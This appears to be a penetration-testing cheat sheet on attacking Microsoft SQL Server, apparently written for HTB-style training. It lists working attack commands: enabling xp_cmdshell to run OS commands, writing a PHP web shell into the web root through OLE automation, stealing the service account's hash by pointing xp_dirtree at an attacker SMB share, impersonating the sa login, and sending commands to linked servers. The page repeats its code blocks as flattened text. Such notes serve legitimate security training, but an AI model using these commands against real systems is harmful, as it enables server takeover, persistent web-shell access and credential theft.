MSSQL

MSSQL uses ports TCP/1433 and UDP/1434

Interacting with MSSQL

mssqlclient.py -p 1433 user@<ip>
mssqlclient.py <user>@<FQDN/IP> -windows-auth     # connect using Windows Auth
sqsh -S <ip> -U user -P P@sswd -h                 
sqsh -S <ip> -U .\\user -P 'P@sswd' -h            # Windows Auth local account
sqlcmd.exe -S <ip> -U user -P P@sswd -y 30 -Y 30

SQL Syntax

# Show Databases
SELECT name FROM master.dbo.sysdatabases
# Select a Database
USE htbusers
# Show Tables
SELECT table_name FROM htbusers.INFORMATION_SCHEMA.TABLES
# Select all Data from Table "users"
SELECT * FROM users

Execute Commands

# Commands execution using xp_cmdshell
# Enable xp_cmdshell / GO after each command
EXECUTE sp_configure 'show advanced options', 1
RECONFIGURE
EXECUTE sp_configure 'xp_cmdshell', 1
RECONFIGURE
xp_cmdshell 'whoami'

Read & Write Local Files

# Enable Ole Automation Procedures
sp_configure 'show advanced options', 1
RECONFIGURE
sp_configure 'Ole Automation Procedures', 1
RECONFIGURE

# Create a File
DECLARE @OLE INT
DECLARE @FileID INT
EXECUTE sp_OACreate 'Scripting.FileSystemObject', @OLE OUT
EXECUTE sp_OAMethod @OLE, 'OpenTextFile', @FileID OUT, 'c:\inetpub\wwwroot\webshell.php', 8, 1
EXECUTE sp_OAMethod @FileID, 'WriteLine', Null, '<?php echo shell_exec($_GET["c"]);?>'
EXECUTE sp_OADestroy @FileID
EXECUTE sp_OADestroy @OLE
GO

# Read Local Files
# By default, MSSQL allows file read on any file in the operating system to which the account has read access
SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents

Capture MSSQL Service Hash

# Run responder OR impacket-smbserver
# XP_DIRTREE and XP_SUBDIRS Hash Stealing for the user mssqlsvc
EXEC master..xp_dirtree '\\10.10.110.17\share\'
EXEC master..xp_subdirs '\\10.10.110.17\share\'

Impersonate Existing Users with MSSQL

# Identify Users that We Can Impersonate
SELECT distinct b.name
FROM sys.server_permissions a
INNER JOIN sys.server_principals b
ON a.grantor_principal_id = b.principal_id
WHERE a.permission_name = 'IMPERSONATE'
GO

# Verifying our Current User and Role
EXECUTE AS LOGIN = 'sa'    // recommended to run it within the master DB
SELECT SYSTEM_USER
SELECT IS_SRVROLEMEMBER('sysadmin')
go
# To revert the operation
REVERT

Linked Database

# Identify linked Servers in MSSQL : 1 = remote server ; 0 = linked server
SELECT srvname, isremote FROM sysservers

# send pass-through commands to the linked servers
EXECUTE('select @@servername, @@version, system_user, is_srvrolemember(''sysadmin'')') AT [10.0.0.12\SQLEXPRESS]

PreviousProtocols & Services NextFile Transfers

Last updated 2 days ago

mssqlclient.py -p 1433 user@<ip> mssqlclient.py <user>@<FQDN/IP> -windows-auth # connect using Windows Auth sqsh -S <ip> -U user -P P@sswd -h sqsh -S <ip> -U .\\user -P 'P@sswd' -h # Windows Auth local account sqlcmd.exe -S <ip> -U user -P P@sswd -y 30 -Y 30

# Show Databases SELECT name FROM master.dbo.sysdatabases # Select a Database USE htbusers # Show Tables SELECT table_name FROM htbusers.INFORMATION_SCHEMA.TABLES # Select all Data from Table "users" SELECT * FROM users

# Commands execution using xp_cmdshell # Enable xp_cmdshell / GO after each command EXECUTE sp_configure 'show advanced options', 1 RECONFIGURE EXECUTE sp_configure 'xp_cmdshell', 1 RECONFIGURE xp_cmdshell 'whoami'

# Enable Ole Automation Procedures sp_configure 'show advanced options', 1 RECONFIGURE sp_configure 'Ole Automation Procedures', 1 RECONFIGURE # Create a File DECLARE @OLE INT DECLARE @FileID INT EXECUTE sp_OACreate 'Scripting.FileSystemObject', @OLE OUT EXECUTE sp_OAMethod @OLE, 'OpenTextFile', @FileID OUT, 'c:\inetpub\wwwroot\webshell.php', 8, 1 EXECUTE sp_OAMethod @FileID, 'WriteLine', Null, '<?php echo shell_exec($_GET["c"]);?>' EXECUTE sp_OADestroy @FileID EXECUTE sp_OADestroy @OLE GO # Read Local Files # By default, MSSQL allows file read on any file in the operating system to which the account has read access SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents

# Identify Users that We Can Impersonate SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE' GO # Verifying our Current User and Role EXECUTE AS LOGIN = 'sa' // recommended to run it within the master DB SELECT SYSTEM_USER SELECT IS_SRVROLEMEMBER('sysadmin') go # To revert the operation REVERT

# Identify linked Servers in MSSQL : 1 = remote server ; 0 = linked server SELECT srvname, isremote FROM sysservers # send pass-through commands to the linked servers EXECUTE('select @@servername, @@version, system_user, is_srvrolemember(''sysadmin'')') AT [10.0.0.12\SQLEXPRESS]